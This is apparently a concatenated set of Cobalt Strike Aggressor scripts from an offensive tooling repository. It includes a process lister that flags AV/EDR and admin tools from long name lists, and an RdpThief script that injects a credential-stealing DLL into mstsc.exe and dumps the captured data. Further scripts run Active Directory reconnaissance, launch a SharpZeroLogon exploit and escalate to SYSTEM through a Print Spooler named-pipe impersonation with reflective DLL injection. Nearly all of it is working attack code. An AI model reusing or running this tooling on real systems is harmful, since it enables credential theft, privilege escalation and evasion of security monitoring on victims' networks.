"lucoms~1.exe", "luinit.exe", "luspt.exe", "makereport.exe", "mantispm.exe", "mapisvc32.exe", "masalert.exe", "massrv.exe", "mcafeefire.exe", "mcagent.exe", "mcappins.exe", "mcconsol.exe", "mcdash.exe", "mcdetect.exe", "mcepoc.exe", "mcepocfg.exe", "mcinfo.exe", "mcmnhdlr.exe", "mcmscsvc.exe", "mcods.exe", "mcpalmcfg.exe", "mcpromgr.exe", "mcregwiz.exe", "mcscript.exe", "mcscript_inuse.exe", "mcshell.exe", "mcshield.exe", "mcshld9x.exe", "mcsysmon.exe", "mctool.exe", "mctray.exe", "mctskshd.exe", "mcuimgr.exe", "mcupdate.exe", "mcupdmgr.exe", "mcvsftsn.exe", "mcvsrte.exe", "mcvsshld.exe", "mcwce.exe", "mcwcecfg.exe", "md.exe", "mfeann.exe", "mfevtps.exe", "mfin32.exe", "mfw2en.exe", "mfweng3.02d30.exe", "mgavrtcl.exe", "mgavrte.exe", "mghtml.exe", "mgui.exe", "minilog.exe", "mmod.exe", "monitor.exe", "monsvcnt.exe", "monsysnt.exe", "moolive.exe", "mostat.exe", "mpcmdrun.exe", "mpf.exe", "mpfagent.exe", "mpfconsole.exe", "mpfservice.exe", "mpftray.exe", "mps.exe", "mpsevh.exe", "mpsvc.exe", "mrf.exe", "mrflux.exe", "msapp.exe", "msascui.exe", "msbb.exe", "msblast.exe", "mscache.exe", "msccn32.exe", "mscifapp.exe", "mscman.exe", "msconfig.exe", "msdm.exe", "msdos.exe", "msiexec16.exe", "mskagent.exe", "mskdetct.exe", "msksrver.exe", "msksrvr.exe", "mslaugh.exe", "msmgt.exe", "msmpeng.exe", "msmsgri32.exe", "msscli.exe", "msseces.exe", "mssmmc32.exe", "msssrv.exe", "mssys.exe", "msvxd.exe", "mu0311ad.exe", "mwatch.exe", "myagttry.exe", "n32scanw.exe", "nSMDemf.exe", "nSMDmon.exe", "nSMDreal.exe", "nSMDsch.exe", "naPrdMgr.exe", "nav.exe", "navap.navapsvc.exe", "navapsvc.exe", "navapw32.exe", "navdx.exe", "navlu32.exe", "navnt.exe", "navstub.exe", "navw32.exe", "navwnt.exe", "nc2000.exe", "ncinst4.exe", "MSASCuiL.exe"); 11 | @av1 = @("MBAMService.exe", "mbamtray.exe", "CylanceSvc.exe", "ndd32.exe", "ndetect.exe", "neomonitor.exe", "neotrace.exe", "neowatchlog.exe", "netalertclient.exe", "netarmor.exe", "netcfg.exe", "netd32.exe", "netinfo.exe", "netmon.exe", "netscanpro.exe", "netspyhunter-1.2.exe", "netstat.exe", "netutils.exe", "networx.exe", "ngctw32.exe", "ngserver.exe", "nip.exe", "nipsvc.exe", "nisoptui.exe", "nisserv.exe", "nisum.exe", "njeeves.exe", "nlsvc.exe", "nmain.exe", "nod32.exe", "nod32krn.exe", "nod32kui.exe", "normist.exe", "norton_internet_secu_3.0_407.exe", "notstart.exe", "npf40_tw_98_nt_me_2k.exe", "npfmessenger.exe", "npfmntor.exe", "npfmsg.exe", "nprotect.exe", "npscheck.exe", "npssvc.exe", "nrmenctb.exe", "nsched32.exe", "nscsrvce.exe", "nsctop.exe", "nsmdtr.exe", "nssys32.exe", "nstask32.exe", "nsupdate.exe", "nt.exe", "ntcaagent.exe", "ntcadaemon.exe", "ntcaservice.exe", "ntrtscan.exe", "ntvdm.exe", "ntxconfig.exe", "nui.exe", "nupgrade.exe", "nvarch16.exe", "nvc95.exe", "nvcoas.exe", "nvcsched.exe", "nvsvc32.exe", "nwinst4.exe", "nwservice.exe", "nwtool16.exe", "nymse.exe", "oasclnt.exe", "oespamtest.exe", "ofcdog.exe", "ofcpfwsvc.exe", "okclient.exe", "olfsnt40.exe", "ollydbg.exe", "onsrvr.exe", "op_viewer.exe", "opscan.exe", "optimize.exe", "ostronet.exe", "otfix.exe", "outpost.exe", "outpostinstall.exe", "outpostproinstall.exe", "paamsrv.exe", "padmin.exe", "pagent.exe", "pagentwd.exe", "panixk.exe", "patch.exe", "pavbckpt.exe", "pavcl.exe", "pavfires.exe", "pavfnsvr.exe", "pavjobs.exe", "pavkre.exe", "pavmail.exe", "pavprot.exe", "pavproxy.exe", "pavprsrv.exe", "pavsched.exe", "pavsrv50.exe", "pavsrv51.exe", "pavsrv52.exe", "pavupg.exe", "pavw.exe", "pccNT.exe", "pccclient.exe", "pccguide.exe", "pcclient.exe", "pccnt.exe", "pccntmon.exe", "pccntupd.exe", "pccpfw.exe", "pcctlcom.exe", "pccwin98.exe", "pcfwallicon.exe", "pcip10117_0.exe", "pcscan.exe", "pctsAuxs.exe", "pctsGui.exe", "pctsSvc.exe", "pctsTray.exe", "pdsetup.exe", "pep.exe", "periscope.exe", "persfw.exe", "perswf.exe", "pf2.exe", "pfwadmin.exe", "pgmonitr.exe", "pingscan.exe", "platin.exe", "pmon.exe", "pnmsrv.exe", "pntiomon.exe", "pop3pack.exe", "pop3trap.exe", "poproxy.exe", "popscan.exe", "portdetective.exe", "portmonitor.exe", "powerscan.exe", "ppinupdt.exe", "ppmcativedetection.exe", "pptbc.exe", "ppvstop.exe", "pqibrowser.exe", "pqv2isvc.exe", "prevsrv.exe", "prizesurfer.exe", "prmt.exe", "prmvr.exe", "programauditor.exe", "proport.exe", "protectx.exe", "psctris.exe", "psh_svc.exe", "psimreal.exe", "psimsvc.exe", "pskmssvc.exe", "pspf.exe", "purge.exe", "pview.exe", "pviewer.exe", "pxemtftp.exe", "pxeservice.exe", "qclean.exe", "qconsole.exe", "qdcsfs.exe", "qoeloader.exe", "qserver.exe", "rapapp.exe", "rapuisvc.exe", "ras.exe", "rasupd.exe", "rav7.exe", "rav7win.exe", "rav8win32eng.exe", "ravmon.exe", "ravmond.exe", "ravstub.exe", "ravxp.exe", "ray.exe", "rb32.exe", "rcsvcmon.exe", "rcsync.exe", "realmon.exe", "reged.exe", "remupd.exe", "reportsvc.exe", "rescue.exe", "rescue32.exe", "rfwmain.exe", "rfwproxy.exe", "rfwsrv.exe", "rfwstub.exe", "rnav.exe", "rrguard.exe", "rshell.exe", "rsnetsvr.exe", "rstray.exe", "rtvscan.exe", "rtvscn95.exe", "rulaunch.exe", "saHookMain.exe", "safeboxtray.exe", "safeweb.exe", "sahagent.exescan32.exe", "sav32cli.exe", "save.exe", "savenow.exe", "savroam.exe", "savscan.exe", "savservice.exe", "sbserv.exe", "scam32.exe", "scan32.exe", "scan95.exe", "scanexplicit.exe", "scanfrm.exe", "scanmailoutlook.exe", "scanpm.exe", "schdsrvc.exe", "schupd.exe", "scrscan.exe", "seestat.exe", "serv95.exe", "setloadorder.exe", "setup_flowprotector_us.exe", "setupguimngr.exe", "setupvameeval.exe", "sfc.exe", "sgssfw32.exe", "sh.exe", "shellspyinstall.exe", "shn.exe", "showbehind.exe", "shstat.exe", "siteadv.exe", "smOutlookPack.exe", "smc.exe", "smoutlookpack.exe", "sms.exe", "smsesp.exe", "smss32.exe", "sndmon.exe", "sndsrvc.exe", "soap.exe", "sofi.exe", "softManager.exe", "spbbcsvc.exe", "spf.exe", "sphinx.exe", "spideragent.exe", "spiderml.exe", "spidernt.exe", "spiderui.exe", "spntsvc.exe", "spoler.exe", "spoolcv.exe", "spoolsv32.exe", "spyxx.exe", "srexe.exe", "srng.exe", "srvload.exe", "srvmon.exe", "ss3edit.exe", "sschk.exe", "ssg_4104.exe", "ssgrate.exe", "st2.exe", "stcloader.exe", "stinger.exe", "stopp.exe", "stwatchdog.exe", "supftrl.exe", "support.exe", "supporter5.exe", "svcGenericHost", "svcharge.exe", "svchostc.exe", "svchosts.exe", "svcntaux.exe", "svdealer.exe", "svframe.exe", "svtray.exe", "swdsvc.exe", "sweep95.exe", "sweepnet.sweepsrv.sys.swnetsup.exe", "sweepsrv.exe", "swnetsup.exe", "swnxt.exe", "swserver.exe", "symlcsvc.exe", "symproxysvc.exe", "symsport.exe", "symtray.exe", "symwsc.exe", "sysdoc32.exe", "sysedit.exe", "sysupd.exe", "taskmo.exe", "taumon.exe", "tbmon.exe", "tbscan.exe", "tc.exe", "tca.exe", "tclproc.exe", "tcm.exe", "tdimon.exe", "tds-3.exe", "tds2-98.exe", "tds2-nt.exe", "teekids.exe", "tfak.exe", "tfak5.exe", "tgbob.exe", "titanin.exe", "titaninxp.exe", "tmas.exe", "tmlisten.exe", "tmntsrv.exe", "tmpfw.exe", "tmproxy.exe", "tnbutil.exe", "tpsrv.exe", "tracesweeper.exe", "trickler.exe", "trjscan.exe", "trjsetup.exe", "trojantrap3.exe", "trupd.exe", "tsadbot.exe", "tvmd.exe", "tvtmd.exe", "udaterui.exe", "undoboot.exe", "unvet32.exe", "updat.exe", "updtnv28.exe", "upfile.exe", "upgrad.exe", "uplive.exe", "urllstck.exe", "usergate.exe", "usrprmpt.exe", "utpost.exe", "v2iconsole.exe", "v3clnsrv.exe", "v3exec.exe", "v3imscn.exe", "vbcmserv.exe", "vbcons.exe", "vbust.exe", "vbwin9x.exe", "vbwinntw.exe", "vcsetup.exe", "vet32.exe", "vet95.exe", "vetmsg.exe", "vettray.exe", "vfsetup.exe", "vir-help.exe", "virusmdpersonalfirewall.exe", "vnlan300.exe", "vnpc3000.exe", "vpatch.exe", "vpc32.exe", "vpc42.exe", "vpfw30s.exe", "vprosvc.exe", "vptray.exe", "vrv.exe", "vrvmail.exe", "vrvmon.exe", "vrvnet.exe", "vscan40.exe", "vscenu6.02d30.exe", "vsched.exe", "vsecomr.exe", "vshwin32.exe", "vsisetup.exe", "vsmain.exe", "vsmon.exe", "vsserv.exe", "vsstat.exe", "vstskmgr.exe", "vswin9xe.exe", "vswinntse.exe", "vswinperse.exe", "w32dsm89.exe", "w9x.exe", "watchdog.exe", "webdav.exe", "webproxy.exe", "webscanx.exe", "webtrap.exe", "webtrapnt.exe", "wfindv32.exe", "wfxctl32.exe", "wfxmod32.exe", "wfxsnt40.exe", "whoswatchingme.exe", "wimmun32.exe", "win-bugsfix.exe", "winactive.exe", "winmain.exe", "winnet.exe", "winppr32.exe", "winrecon.exe", "winroute.exe", "winservn.exe", "winssk32.exe", "winstart.exe", "winstart001.exe", "wintsk32.exe", "winupdate.exe", "wkufind.exe", "wnad.exe", "wnt.exe", "wradmin.exe", "wrctrl.exe", "wsbgate.exe", "wssfcmai.exe", "wupdater.exe", "wupdt.exe", "wyvernworksfirewall.exe", "xagt.exe", "xagtnotif.exe", "xcommsvr.exe", "xfilter.exe", "xpf202en.exe", "zanda.exe", "zapro.exe", "zapsetup3001.exe", "zatutor.exe", "zhudongfangyu.exe", "zlclient.exe", "zlh.exe", "zonalm2601.exe", "zonealarm.exe", "cb.exe", "MsMpEng.exe", "MsSense.exe", "CSFalconService.exe", "CSFalconContainer.exe", "redcloak.exe", "OmniAgent.exe"); 12 | @admin = @("MobaXterm.exe", "bash.exe", "git-bash.exe", "mmc.exe", "Code.exe", "notepad++.exe", "notepad.exe", "cmd.exe", "drwatson.exe", "DRWTSN32.EXE", "drwtsn32.exe", "dumpcap.exe", "ethereal.exe", "filemon.exe", "idag.exe", "idaw.exe", "k1205.exe", "loader32.exe", "netmon.exe", "netstat.exe", "netxray.exe", "NmWebService.exe", "nukenabber.exe", "portmon.exe", "powershell.exe", "PRTG Traffic Gr.exe", "PRTG Traffic Grapher.exe", "prtgwatchdog.exe", "putty.exe", "regmon.exe", "SystemEye.exe", "taskman.exe", "TASKMGR.EXE", "tcpview.exe", "Totalcmd.exe", "TrafMonitor.exe", "windbg.exe", "winobj.exe", "wireshark.exe", "WMonAvNScan.exe", "WMonAvScan.exe", "WMonSrv.exe","regedit.exe", "regedit32.exe", "accesschk.exe", "accesschk64.exe", "AccessEnum.exe", "ADExplorer.exe", "ADInsight.exe", "adrestore.exe", "Autologon.exe", "Autoruns.exe", "Autoruns64.exe", "autorunsc.exe", "autorunsc64.exe", "Bginfo.exe", "Bginfo64.exe", "Cacheset.exe", "Clockres.exe", "Clockres64.exe", "Contig.exe", "Contig64.exe", "Coreinfo.exe", "ctrl2cap.exe", "Dbgview.exe", "Desktops.exe", "disk2vhd.exe", "diskext.exe", "diskext64.exe", "Diskmon.exe", "DiskView.exe", "du.exe", "du64.exe", "efsdump.exe", "FindLinks.exe", "FindLinks64.exe", "handle.exe", "handle64.exe", "hex2dec.exe", "hex2dec64.exe", "junction.exe", "junction64.exe", "ldmdump.exe", "Listdlls.exe", "Listdlls64.exe", "livekd.exe", "livekd64.exe", "LoadOrd.exe", "LoadOrd64.exe", "LoadOrdC.exe", "LoadOrdC64.exe", "logonsessions.exe", "logonsessions64.exe", "movefile.exe", "movefile64.exe", "notmyfault.exe", "notmyfault64.exe", "notmyfaultc.exe", "notmyfaultc64.exe", "ntfsinfo.exe", "ntfsinfo64.exe", "pagedfrg.exe", "pendmoves.exe", "pendmoves64.exe", "pipelist.exe", "pipelist64.exe", "portmon.exe", "procdump.exe", "procdump64.exe", "procexp.exe", "procexp64.exe", "Procmon.exe", "PsExec.exe", "PsExec64.exe", "psfile.exe", "psfile64.exe", "PsGetsid.exe", "PsGetsid64.exe", "PsInfo.exe", "PsInfo64.exe", "pskill.exe", "pskill64.exe", "pslist.exe", "pslist64.exe", "PsLoggedon.exe", "PsLoggedon64.exe", "psloglist.exe", "pspasswd.exe", "pspasswd64.exe", "psping.exe", "psping64.exe", "PsService.exe", "PsService64.exe", "psshutdown.exe", "pssuspend.exe", "pssuspend64.exe", "RAMMap.exe", "RegDelNull.exe", "RegDelNull64.exe", "regjump.exe", "ru.exe", "ru64.exe", "sdelete.exe", "sdelete64.exe", "ShareEnum.exe", "ShellRunas.exe", "sigcheck.exe", "sigcheck64.exe", "streams.exe", "streams64.exe", "strings.exe", "strings64.exe", "sync.exe", "sync64.exe", "Sysmon.exe", "Sysmon64.exe", "Tcpvcon.exe", "Tcpview.exe", "Testlimit.exe", "Testlimit64.exe", "vmmap.exe", "Volumeid.exe", "Volumeid64.exe", "whois.exe", "whois64.exe", "Winobj.exe", "ZoomIt.exe", "KeePass.exe", "1Password.exe", "lastpass.exe"); 13 | 14 | local('$outps $temp $name $ppid $pid $arch $user $session @ps'); 15 | $outps .= "\cC[*]\o Process List with process highlighting\n"; 16 | $outps .= "\cC[*]\o Current Running PID: \c8 Yellow ". $bd['pid'] ." \o \n"; 17 | $outps .= "\cC[*]\o Explorer/Winlogon: \c2 BLUE \o \n"; 18 | $outps .= "\cC[*]\o Admin Tools: \cB LIGHT BLUE \o \n"; 19 | $outps .= "\cC[*]\o Browsers: \c3 GREEN \o \n"; 20 | $outps .= "\cC[*]\o AV/EDR: \c4 RED \o \n\n"; 21 | $outps .= " PID PPID Name Arch Session User\n"; 22 | $outps .= "\cE --- ---- ---- ---- ------- -----\n"; 23 | 24 | foreach $temp (split("\n", ["$2" trim])) { 25 | ($name, $ppid, $pid, $arch, $user, $session) = split("\t", $temp); 26 | # highlight AV processes in RED. 27 | if(iff($name in @av,true,false)) { 28 | push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 29 | # highlight current process in YELLOW 30 | } else if ($pid eq $bd['pid']) { 31 | push(@ps, %(pid => $pid, entry => "\c8 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 32 | # highlight explorer , winlogon in BLUE 33 | } else if ($name eq "explorer.exe" || $name eq "winlogon.exe") { 34 | push(@ps, %(pid => $pid, entry => "\c2 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 35 | # highlight browsers processes in GREEN 36 | } else if ($name eq "chrome.exe" || $name eq "firefox.exe" || $name eq "iexplore.exe" || $name eq "MicrosoftEdgeCP.exe" || $name eq "MicrosoftEdge.exe") { 37 | push(@ps, %(pid => $pid, entry => "\c3 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 38 | # highlight av1 processes in RED. 39 | } else if(iff($name in @av1,true,false)) { 40 | push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 41 | # highlight Admin Tools in Light Blue 42 | } else if(iff($name in @admin,true,false)) { 43 | push(@ps, %(pid => $pid, entry => "\cB $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o")); 44 | } else { 45 | push(@ps, %(pid => $pid, entry => " $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user")); 46 | } 47 | } 48 | # sort the processes please 49 | sort({ return $1['pid'] <=> $2['pid']; }, @ps); 50 | # append to our outstring 51 | foreach $temp (@ps) { 52 | $outps .= "$temp['entry'] \n"; 53 | } 54 | return $outps; 55 | } 56 | -------------------------------------------------------------------------------- /scripts/cmd/RdpThief.cna: -------------------------------------------------------------------------------- 1 | @beacons = @(); 2 | @pids = @(); 3 | 4 | on heartbeat_5s{ 5 | 6 | foreach $index => $beaconid (@beacons) 7 | { 8 | 9 | bps($beaconid,&handleProcess); 10 | } 11 | 12 | } 13 | 14 | 15 | sub handleProcess{ 16 | 17 | $processList = $2; 18 | $index = indexOf($processList, "mstsc.exe", 0) + 9; 19 | 20 | if($index > 9){ 21 | 22 | $temp = substr($processList,$index,-1); 23 | $pid = split("\t",$temp)[2]; 24 | 25 | if ($pid !in @pids){ 26 | add(@pids,$pid,0); 27 | blog($1,"Injecting into mstsc.exe with PID: $pid"); 28 | bshinject($1, $pid , "x64" ,script_resource("exe/RdpThief_x64.tmp")); 29 | } 30 | 31 | } 32 | 33 | 34 | 35 | } 36 | 37 | alias rdpthief_enable { 38 | 39 | blog($1, "RdpThief enabled \n"); 40 | add(@beacons,$1,0); 41 | 42 | } 43 | 44 | 45 | alias rdpthief_disable { 46 | 47 | blog($1, "Disabling RdpThief"); 48 | remove(@beacons,$1); 49 | } 50 | alias rdpthief_dump { 51 | bshell($1,"type %temp%\\data.bin") 52 | } 53 | 54 | -------------------------------------------------------------------------------- /scripts/cmd/Recon-AD.cna: -------------------------------------------------------------------------------- 1 | #Recon-AD 2 | #author Cornelis de Plaa 3 | #@outflank.nl 4 | 5 | #Using Active Directory Service Interfaces (ADSI) to query Active Directory objects and corresponding attributes. 6 | 7 | #register help 8 | beacon_command_register("Recon-AD-Domain", "Using Active Directory Domain Services to enumerate domain information.", 9 | "Using Active Directory Domain Services to enumerate domain information.\n\n" . 10 | "Synopsis: Recon-AD-Domain\n\n"); 11 | 12 | beacon_command_register("Recon-AD-Users", "Use ADSI to query Active Directory user objects and attributes.", 13 | "Use Active Directory Service Interfaces (ADSI) to query user objects and corresponding attributes.\n\n" . 14 | "Synopsis: Recon-AD-Users [username], to query a specific user object including attributes.\n" . 15 | " Recon-AD-Users [*admin*], to query for usernames containing admin.\n" . 16 | " Recon-AD-Users All, to query all user objects including attributes.\n"); 17 | 18 | beacon_command_register("Recon-AD-Computers", "Use ADSI to query Active Directory computer objects and attributes.", 19 | "Use Active Directory Service Interfaces (ADSI) to query computer objects and corresponding attributes.\n\n" . 20 | "Synopsis: Recon-AD-Computers [computername], to query a specific computer object including attributes.\n" . 21 | " Recon-AD-Computers [*dc*], to query for computernames containing dc.\n" . 22 | " Recon-AD-Computers All, to query all computer objects including attributes.\n"); 23 | 24 | beacon_command_register("Recon-AD-Groups", "Use ADSI to query Active Directory group objects and attributes.", 25 | "Use Active Directory Service Interfaces (ADSI) to query group objects and corresponding attributes.\n\n" . 26 | "Synopsis: Recon-AD-Groups [groupname], to query a specific group object including attributes.\n" . 27 | " Recon-AD-Groups [*admin*], to query for groupnames containing admin.\n" . 28 | " Recon-AD-Groups All, to query all group objects including attributes.\n"); 29 | 30 | beacon_command_register("Recon-AD-LocalGroups", "Use ADSI to query a computer for specific localgroups.", 31 | "Use Active Directory Service Interfaces (ADSI) to query a computer for specific localgroups (default Administrators group).\n\n" . 32 | "Synopsis: Recon-AD-LocalGroups [computername] [groupname], to query a specific computer and localgroup.\n"); 33 | 34 | beacon_command_register("Recon-AD-AllLocalGroups", "Use ADSI to query a computer for all localgroups.", 35 | "Use Active Directory Service Interfaces (ADSI) to query a computer for all localgroups.\n\n" . 36 | "Synopsis: Recon-AD-AllLocalGroups [computername], to query a specific computer for all localgroups.\n"); 37 | 38 | beacon_command_register("Recon-AD-SPNs", "Use ADSI to query Active Directory user objects with Service Principal Names (SPN) configured.", 39 | "Use Active Directory Service Interfaces (ADSI) to query user objects with Service Principal Names (SPN) configured.\n\n" . 40 | "Synopsis: Recon-AD-SPNs\n\n"); 41 | 42 | 43 | alias Recon-AD-Domain { 44 | $bid = $1; 45 | blog($bid, "Let's enumerate the domain\n"); 46 | bdllspawn($bid, script_resource("exe/Recon-AD-Domain.dll"), "", "Recon-AD-Domain", 5000, false); 47 | } 48 | 49 | alias Recon-AD-Users { 50 | $bid = $1; 51 | 52 | $input = substr($0, 15); 53 | @args = split(' ', $input); 54 | 55 | $object = @args[0]; 56 | 57 | if ($object eq "") { 58 | berror($bid, "Please specify a username or all."); 59 | return; 60 | } 61 | else if ($object eq "all") { 62 | blog($bid, "Let's enumerate all users\n"); 63 | bdllspawn($bid, script_resource("exe/Recon-AD-Users.dll"), "", "Recon-AD-Users", 5000, false); 64 | } 65 | else{ 66 | $param = "(sAMAccountName=" . $object . ")"; 67 | blog($bid, "Let's enumerate user " . $object . "\n"); 68 | bdllspawn($bid, script_resource("exe/Recon-AD-Users.dll"), $param, "Recon-AD-Users", 5000, false); 69 | } 70 | } 71 | 72 | alias Recon-AD-Computers { 73 | $bid = $1; 74 | 75 | $input = substr($0, 19); 76 | @args = split(' ', $input); 77 | 78 | $object = @args[0]; 79 | 80 | if ($object eq "") { 81 | berror($bid, "Please specify a computername or all."); 82 | return; 83 | } 84 | else if ($object eq "all") { 85 | blog($bid, "Let's enumerate all computers\n"); 86 | bdllspawn($1, script_resource("exe/Recon-AD-Computers.dll"), "", "Recon-AD-Computers", 5000, false); 87 | } 88 | else { 89 | $param = "(cn=" . $object . ")"; 90 | blog($bid, "Let's enumerate computer " . $object . "\n"); 91 | bdllspawn($1, script_resource("exe/Recon-AD-Computers.dll"), $param, "Recon-AD-Computers", 5000, false); 92 | } 93 | } 94 | 95 | alias Recon-AD-Groups { 96 | $bid = $1; 97 | 98 | $input = substr($0, 16); 99 | @args = split(' ', $input); 100 | 101 | #For Groups with spaces in Groupname... 102 | $object = @args[0]; 103 | $object1 = @args[1]; 104 | $object2 = @args[2]; 105 | $object3 = @args[3]; 106 | $object4 = @args[4]; 107 | $object5 = @args[5]; 108 | 109 | if ($object eq "") { 110 | berror($bid, "Please specify a groupname or all."); 111 | return; 112 | } 113 | else if ($object eq "all") { 114 | blog($bid, "Let's enumerate all groups\n"); 115 | bdllspawn($1, script_resource("exe/Recon-AD-Groups.dll"), "", "Recon-AD-Groups", 5000, false); 116 | } 117 | else if (@args[1] eq ""){ 118 | $param = "(sAMAccountName=" . $object . ")"; 119 | } 120 | else if (@args[2] eq ""){ 121 | $param = "(sAMAccountName=" . $object . " " . $object1 . ")"; 122 | } 123 | else if (@args[3] eq ""){ 124 | $param = "(sAMAccountName=" . $object . " " . $object1 . " " . $object2 . ")"; 125 | } 126 | else if (@args[4] eq ""){ 127 | $param = "(sAMAccountName=" . $object . " " . $object1 . " " . $object2 . " " . $object3 . ")"; 128 | } 129 | else if (@args[5] eq ""){ 130 | $param = "(sAMAccountName=" . $object . " " . $object1 . " " . $object2 . " " . $object3 . " " . $object4 . ")"; 131 | } 132 | else { 133 | $param = "(sAMAccountName=" . $object . " " . $object1 . " " . $object2 . " " . $object3 . " " . $object4 . " " . $object5 . ")"; 134 | } 135 | blog($bid, "Let's enumerate group " . $object . " " . $object1 . " " . $object2 . " " . $object3 . " " . $object4 . " " . $object5"\n"); 136 | bdllspawn($1, script_resource("exe/Recon-AD-Groups.dll"), $param, "Recon-AD-Groups", 5000, false); 137 | } 138 | 139 | alias Recon-AD-AllLocalGroups { 140 | $bid = $1; 141 | 142 | $input = substr($0, 24); 143 | @args = split(' ', $input); 144 | 145 | $object = @args[0]; 146 | 147 | if ($object eq "") { 148 | berror($bid, "Please specify a computername."); 149 | return; 150 | } 151 | else{ 152 | $param = $object; 153 | } 154 | blog($bid, "Let's enumerate computer " . $object . " for localgroups\n"); 155 | bdllspawn($bid, script_resource("exe/Recon-AD-AllLocalGroups.dll"), $param, "Recon-AD-AllLocalGroups", 5000, false); 156 | } 157 | 158 | alias Recon-AD-LocalGroups { 159 | $bid = $1; 160 | 161 | $input = substr($0, 21); 162 | @args = split(' ', $input); 163 | 164 | $object = @args[0]; 165 | $object1 = @args[1]; 166 | $object2 = @args[2]; 167 | $object3 = @args[3]; 168 | 169 | if ($object eq "") { 170 | berror($bid, "Please specify a computername and localgroup."); 171 | return; 172 | } 173 | else if (@args[1] eq ""){ 174 | $param = $object; 175 | } 176 | else if (@args[2] eq ""){ 177 | $param = $object . " " . $object1; 178 | } 179 | else if (@args[3] eq ""){ 180 | $param = $object . " " . $object1 . " " . $object2; 181 | } 182 | else { 183 | $param = $object . " " . $object1 . " " . $object2 . " " . $object3; 184 | } 185 | blog($bid, "Let's enumerate computer " . $object . " for localgroup " . $object1 . " " . $object2 . " " . $object3"\n"); 186 | bdllspawn($1, script_resource("exe/Recon-AD-LocalGroups.dll"), $param, "Recon-AD-LocalGroups", 5000, false); 187 | } 188 | 189 | alias Recon-AD-SPNs { 190 | $bid = $1; 191 | blog($bid, "Let's enumerate all users with SPNs configured.\n"); 192 | bdllspawn($bid, script_resource("exe/Recon-AD-SPNs.dll"), "servicePrincipalName=*", "Recon-AD-SPNs", 5000, false); 193 | } 194 | -------------------------------------------------------------------------------- /scripts/cmd/SharpZeroLogon_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("SharpZeroLogon", "SharpZeroLogon", 2 | "Usage: SharpZeroLogon. [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias sharpup{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "SharpZeroLogon"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpZeroLogon.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/Spool.cna: -------------------------------------------------------------------------------- 1 | import common.CommonUtils; 2 | import beacon.CommandBuilder; 3 | import common.ReflectiveDLL; 4 | 5 | sub SpoolTrigger { 6 | local('$bid $pipename $spawn $offset $padding $patched $dllbytes $file $builder $pid $pipenameW'); 7 | $bid = $1; 8 | $pipename = $2; 9 | $method = $3; 10 | 11 | if ($method eq "spawn") { 12 | # this is to avoid cross-arch injection where possible 13 | if(binfo($bid, 'barch') eq 'x64') { 14 | bdllspawn($1, script_resource("exe/SpoolTrigger.x64.dll"), $pipename, "spooltrigger", 5000, true); 15 | } 16 | else { 17 | bdllspawn($1, script_resource("exe/SpoolTrigger.x86.dll"), $pipename, "spooltrigger", 5000, true); 18 | } 19 | } 20 | else { 21 | # patch and self-inject.. 22 | # first we need to patch up our arguments 23 | # we use internal APIs since bdllinject wants a filepath not bytes 24 | if(binfo($bid, 'barch') eq 'x64') { 25 | $file = script_resource("exe/SpoolTrigger.x64.dll"); 26 | } 27 | else { 28 | $file = script_resource("exe/SpoolTrigger.x86.dll"); 29 | } 30 | 31 | $dllbytes = [CommonUtils readFile: $file]; 32 | $padding = [CommonUtils garbage: "PATCHME"]; 33 | $patched = [CommonUtils patch: $dllbytes, "PATCHME", $padding . $pipename]; 34 | $offset = [ReflectiveDLL findReflectiveLoader: $dllbytes]; 35 | 36 | if($offset <= 0) { 37 | berror($1, "Could not find ReflectiveLoader"); 38 | return; 39 | } 40 | 41 | $pid = binfo($bid, 'pid'); 42 | blog($bid, "Injecting spooltrigger into PID: " . $pid); 43 | $builder = [new CommandBuilder]; 44 | if ([ReflectiveDLL is64: $dllbytes]) { 45 | [$builder setCommand: 43]; 46 | } else { 47 | [$builder setCommand: 9]; 48 | } 49 | [$builder addInteger: parseNumber($pid)]; 50 | [$builder addInteger: $offset]; 51 | [$builder addString: [CommonUtils bString: $patched]]; 52 | call("beacons.task", $null, $bid, cast([$builder build], 'b')); 53 | } 54 | } 55 | 56 | sub SpoolSystem { 57 | local('$mypipe $pipename $builder') 58 | # needed for ImpersonateNamedPipeClient 59 | btask($1, "Tasked beacon to get SYSTEM via spoolss", "T1134"); 60 | bgetprivs($1, "SeImpersonatePrivilege"); 61 | 62 | # fire up a named pipe: (you probably want to rename this) 63 | $mypipe = [CommonUtils garbage: "spooltrigger"]; 64 | $pipename = "\\\\.\\pipe\\" . $mypipe . "\\pipe\\spoolss"; 65 | $builder = [new CommandBuilder]; 66 | [$builder setCommand: 60]; 67 | [$builder addString: $pipename]; 68 | call("beacons.task", $null, $1, cast([$builder build], 'b')); 69 | 70 | # trigger spoolss 71 | SpoolTrigger($1, $mypipe, $2); 72 | 73 | # impersonate the named pipe client 74 | [$builder setCommand: 61]; 75 | call("beacons.task", $null, $1, cast([$builder build], 'b')); 76 | } 77 | 78 | beacon_command_register("spoolsystem", "Gets SYSTEM via spoolss", 79 | "Uses named pipe impersonation to gain SYSTEM via Print Spooler.\n\n" . 80 | "Use: spoolsystem \n\n" . 81 | "Example: spoolsystem selfinject\n" . 82 | "Example: spoolsystem spawn" ); 83 | 84 | alias spoolsystem { 85 | local('$args'); 86 | $args = substr($0, strlen("spoolsystem ")); 87 | 88 | if ($args eq "") { 89 | berror($1, "Please specify an execution method."); 90 | return; 91 | } 92 | SpoolSystem($1, $args); 93 | } -------------------------------------------------------------------------------- /scripts/cmd/SpoolSample.cna: -------------------------------------------------------------------------------- 1 | 